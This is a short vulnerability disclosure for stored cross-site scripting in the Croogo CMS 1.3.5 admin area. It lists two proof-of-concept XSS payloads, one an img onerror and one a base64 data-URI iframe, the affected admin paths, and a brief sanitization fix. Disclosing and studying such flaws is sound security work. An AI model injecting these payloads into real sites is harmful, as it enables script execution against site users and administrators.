Exploit Title:   Croogo Cms Multiple Cross Site Scripting Vulnerabilities
# Date: 06/04/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
# Download Link: http://www.croogo.org/
# Versions Affected: Croogo 1.3.5
# Category:Xss
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Description:

The Vulnerabilities in admin area contacts options and many other place input in is not sanitized. Therefore it results
in a stored cross-site scripting.

POC:
http://www.youtube.com/watch?v=gyt4-0ekalc&feature=youtu.be

Code :-
########################################################################################################
"><img src=x onerror=prompt(0);>

 <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

http://demo.xxx.com/admin/nodes/add/blog

http://demo.xxx.com/admin/vocabularies

http://demo.xxx.com/admin/contacts

##########################################################################################################
Fix:
Better sanitization by restricting special characters.

Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com